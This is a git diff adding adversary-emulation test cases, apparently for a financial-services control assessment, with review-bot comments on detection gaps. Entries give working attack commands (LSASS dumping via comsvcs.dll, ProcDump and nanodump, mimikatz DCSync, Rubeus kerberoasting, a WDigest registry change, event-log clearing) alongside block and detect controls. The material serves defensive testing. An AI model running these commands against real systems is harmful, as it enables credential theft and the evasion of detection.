+ platforms: + guidance: + - http://dlptest.com/http-post/ + block: + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + isv: 1 +- name: Extract data to cloud storage service + description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box + platforms: + guidance: + block: + - Sensitive data sent over the network is blocked by network DLP tool + - Network security tool detects connection to domain based on category from proxy or DNS + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + tid: T1567.002 + tactic: TA0010 + x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + isv: 1 +- name: Extract sensitive data over HTTP C2 + description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP + platforms: + guidance: + - implant> download {{ file }} + block: + - Sensitive data sent over the network is blocked by network DLP tool + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + tid: T1041 + tactic: TA0010 + x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + isv: 1 +Execution: +- name: Macro - Remote Template + description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document + platforms: + - windows + guidance: + block: + - Macro execution is blocked by GPO policy + - Suspicious process 
execution/behavior blocked by endpoint security tool + - Payload on disk deleted/quarantined by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Payload on disk triggers an alert with endpoint security tool + controls: + - Endpoint Protection + - Hardening + - SIEM + metadata: + id: a7134d71-dc49-41a8-a309-ec520c96a089 + tid: T1221 + tactic: TA0005 + x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089 + isv: 1 +Collection: +- name: Screen Capture + description: Capture an image of the user's screen + platforms: + guidance: + - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + metadata: + id: 804512cc-4acf-4be3-a577-ce02ea723fab + tid: T1113 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs + x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab + isv: 1 +- name: Keylogger + description: Log user keystrokes + platforms: + - windows + guidance: + - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + metadata: + id: be524cb1-12e6-4708-ad57-faf91dfad9de + tid: T1056.001 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs + x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de + isv: 1 +metadata: + prefix: FSI + bundle: Financial Services Index 2024 v1.0 
diff --git a/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+ id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ tid: T1113
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+ x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ isv: 1
diff --git a/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+ id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ tid: T1056.001
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+ x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ isv: 1
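Review bot: `platforms:` is left null on the Screen Capture entry even though its only listed tool is a C# source file (`screenshot.cs`) and the sibling Keylogger entry in the same hunk declares `- windows`. A null `platforms` parses as YAML `null` rather than an empty list, which the bundle/summary generation may treat differently from the other entries; I cannot see the generator, so this is a guess. If the implant command is meant to be OS-agnostic, say so explicitly; otherwise add `platforms:` / `- windows` to match the Keylogger entry.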
diff --git a/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
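Review bot: The `detect` list of the remote assistance entry is network-only (known service domains/IPs), while the `block` list leans on application control to stop the tool from being installed; there is no host-side detection to pair with it, so a tool that is already present, portable, or reached through an allowed CDN produces nothing for the SIEM. Suggest adding `- Execution or installation of an unapproved remote assistance tool detected by application control or endpoint process telemetry` under `detect` and `Endpoint Protection` under `controls`. The third block item ("users outside of the tenant") presumes a vendor that supports tenant/account restriction; it would help operators to note that this is a vendor-side enterprise setting rather than something the network controls listed here provide.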
diff --git a/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml b/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml
new file mode 100644
index 0000000..7de64dc
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml
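Review bot: The `block`/`detect` lines for HTTPS C2 over tcp/443 are copied verbatim from the HTTP entry, but over TLS a proxy, firewall or ID/PS without interception only sees connection metadata (SNI, certificate, TLS fingerprint, beacon timing), not the request content, and that distinction decides whether a control in this index actually scores. Suggest making it explicit: `- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool (without TLS inspection this relies on SNI/certificate/TLS-fingerprint metadata or beaconing patterns, not payload content)`. A matching caveat on the block line would tell assessors whether the proxy in scope performs TLS interception.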
@@ -0,0 +1,21 @@
+name: C2 over Dropbox
+description: Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic.
+platforms:
+guidance:
+block:
+- C2 channel using legitimate service is blocked by proxy, firewall, or network behavioral/UEBA tool
+- Connection to legitimate service that falls outside standard business operations blocked based on domain and/or domain categorization
+detect:
+- C2 channel using legitimate service is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+ tid: T1102.002
+ tactic: TA0011
+ x_references:
+ - https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online
+ x_vectr_id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+ isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
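Review bot: Both `block` and `detect` for the tool download entry depend on network signatures for "known-malicious tools", so a recompiled, packed or simply renamed tool defeats every control listed, and the entry gives no endpoint-side fallback. Suggest adding `- New executable written to disk by a network-capable process (browser, curl, certutil, PowerShell) detected using file creation telemetry` under `detect`, `- Download of executable content blocked by web gateway file-type policy` under `block`, and `Endpoint Protection` under `controls`. `platforms:` is also null here although the description targets "the victim system"; a list (even a multi-OS one) keeps it consistent with the Windows entries in this commit.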
diff --git a/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
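Review bot: The block line `Enable Credential Guard to prevent traditional process dumping of LSASS` overstates what Credential Guard does: it isolates domain secrets in LSAIso so a dump of lsass.exe no longer contains NTLM hashes or Kerberos keys, but the `rundll32 comsvcs.dll MiniDump` call itself still succeeds and the file still holds non-isolated material. The control that actually stops a non-protected process from opening LSASS for read is LSA Protection (RunAsPPL), which the SSP entry in this same commit already names; suggest `- Enable LSA Protection (RunAsPPL) so unprotected processes cannot open LSASS for memory read` plus `- Enable Credential Guard so domain secrets are not present in LSASS memory even if a dump succeeds`. The generic EDR detect could also be backed by `- Handle to lsass.exe opened with memory-read access by a process outside an allowlist detected via process access telemetry (e.g. Sysmon Event ID 10)`. Worth stating in guidance that this command needs an elevated context with SeDebugPrivilege, so a failed run is not misread as a block.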
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+ id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ tid: T1547.005
+ tactic: TA0006
+ x_references:
+ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+ x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
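Review bot: `tid: T1547.005` is paired with `tactic: TA0006`, but in ATT&CK the Security Support Provider sub-technique belongs to Persistence and Privilege Escalation (TA0003/TA0004), not Credential Access, so a navigator layer or summary built from these two fields will place the cell on a tactic the technique does not occupy; if the index intentionally files it under Credential Access, the mismatch should at least be a deliberate, documented choice. The first detect line covers only `Control\Lsa\Security Packages`; ATT&CK also lists `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages`, so a rule keyed on one path misses the other. The second detect line would be more actionable as `- Image load into lsass.exe of an unsigned or previously unseen DLL detected via image-load telemetry (e.g. Sysmon Event ID 7), baselined against known LSA packages`. Note that RunAsPPL only refuses unsigned/improperly signed DLLs; it does not stop a validly signed malicious package, which is worth a parenthetical on the block line.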
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+ id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ tid: T1003.001
+ tactic: TA0006
+ x_tools:
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+ x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ isv: 1
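Review bot: The only detect line for the ProcDump entry is the generic "suspicious process execution" one, and since `procdump -ma lsass.exe dump` is a signed Microsoft binary, a detection keyed on the image name is defeated by renaming the executable; the durable signal is the handle to lsass.exe and the minidump written to disk. Suggest adding `- Handle to lsass.exe opened with memory-read access by a non-allowlisted process detected via process access telemetry (e.g. Sysmon Event ID 10)` and `- Minidump file (MDMP header) written to disk by a process other than WerFault detected via file telemetry`. The block line `Enable Credential Guard to prevent traditional process dumping of LSASS` has the same issue as the comsvcs entry: Credential Guard removes domain secrets from the dump rather than preventing the dump, while LSA Protection (RunAsPPL) is what denies the read handle.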
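Review bot: The `--duplicate` flag in the nanodump guidance exists specifically to reuse an LSASS handle already held by another process instead of calling OpenProcess on lsass.exe, so a handle-access detection that works for the ProcDump and comsvcs entries in this commit will not fire here, yet the entry's detect list is the single generic EDR line and does not say so. Suggest `- Handle duplication from a process holding an LSASS handle, or any non-allowlisted access to lsass.exe, detected via process access telemetry; note that --duplicate avoids a direct OpenProcess on LSASS` so assessors do not assume the comsvcs/ProcDump detections cover this case. nanodump also documents options that write the dump with a deliberately invalid minidump signature, so file-content detections keyed on the MDMP header may miss it as well (worth confirming against the tool version used). The name "Extract Logonpasswords" borrows a mimikatz module name; nanodump only produces the dump, and the secrets are parsed offline, which the description could state.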
diff --git a/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 95790889-fb7d-42af-a221-3535e4197cde
+ tid: T1555.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/SharpDPAPI
+ x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
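Review bot: `tid: T1555.003` (Credentials from Web Browsers) covers saved logins, but the guidance `SharpChrome.exe cookies` extracts session cookies, which ATT&CK maps to T1539 Steal Web Session Cookie (also TA0006); as written the index would credit a cookie-theft detection to the saved-password technique. Suggest `tid: T1539`, or, if the entry is meant to cover both `cookies` and `logins`, widen the name/description and guidance accordingly. The second detect line could be sharpened to the concrete artefact: `- Read access to the browser's Cookies/Login Data SQLite files by a process other than the browser detected using file telemetry`, since SharpChrome's DPAPI decryption leaves few other host-side traces.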
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ tid: T1112
+ tactic: TA0005
+ x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
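Review bot: The detect line cites Event ID 4656, which is the handle-request event and fires on opens (including reads, depending on the SACL mask) rather than on the value write; the event that records the actual change to `UseLogonCredential` is 4657 "A registry value was modified", so a rule built from this text alone will be noisy and may not capture the new value. Suggest `(Event ID 4657 for the value change; 4656/4663 for the handle request and access)`, and, where Sysmon is deployed, `- Registry value set on HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential detected via Sysmon Event ID 13`. A `block` item that enforces the value back to 0 via Group Policy/configuration management would also turn this from detection-only into a mitigated technique. The description should say the value re-enables WDigest caching on Windows 8.1/2012 R2 and later, where it is off by default; older hosts need the backported update for the value to matter (worth confirming for the platforms in scope).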
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ tid: T1558.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/Rubeus
+ x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
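Review bot: `block` is an empty string for Kerberoasting even though the detect text itself names the mitigating factors (AES-only accounts, strong passwords); ticket retrieval cannot be prevented for an authenticated user, but the outcome can, and the index should say what makes the retrieved tickets worthless. Suggest `- Accounts with SPNs use gMSA or long random passwords so retrieved TGS tickets are not crackable in a realistic timeframe` and `- RC4 disabled for SPN accounts via msDS-SupportedEncryptionTypes so downgrade requests in strategy 3 fail`, and `Hardening` under `controls`. In strategy 3 it would help analysts to name the 4769 field value (Ticket Encryption Type 0x17 for RC4) and to note that Rubeus has options to deliberately request RC4, so the absence of a downgrade is not evidence of absence. `platforms:` is null here while the technique is Windows/AD-specific.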
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ tid: T1003.006
+ tactic: TA0006
+ x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
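Review bot: The 4662 filter in the detect line lists the same GUID `{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}` twice; that GUID is DS-Replication-Get-Changes, whereas the "Replicating Directory Changes All" right the text names is `{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}`, so a rule copied from this entry would match only the weaker right and miss the one DCSync actually needs. Change the parenthetical to `"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}" (Get-Changes) and/or "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}" (Get-Changes-All)`, and consider listing the third right in the family, DS-Replication-Get-Changes-In-Filtered-Set `{89e95b76-444d-4c62-991a-0facbeda640c}`. The same line has `non-domin` for `non-domain`. The empty `block: - ''` could state the real preventive control: those three rights on the domain head are held only by DC computer accounts and the directory sync service account, with the ACL audited for drift.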
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
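Review bot: The guidance clears Security, Application and System, but the only specific detection is Event ID 1102, which is written solely when the Security log is cleared; clearing Application or System instead produces Event ID 104 (`Microsoft-Windows-Eventlog`, "The System log file was cleared") in the System log, so two of the three guidance steps are currently undetectable by this rule. Change the second detect line to `... using Event Log events (Event ID 1102 for the Security log, Event ID 104 for all other logs)`. Because the technique destroys the local copies, the note should also say these events only help if logs are forwarded (WEF/agent) before the clear, which is the control that actually matters here, with process telemetry for `wevtutil.exe cl`/`clear-log` (4688 / Sysmon 1) as the signal the attacker cannot erase after the fact.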
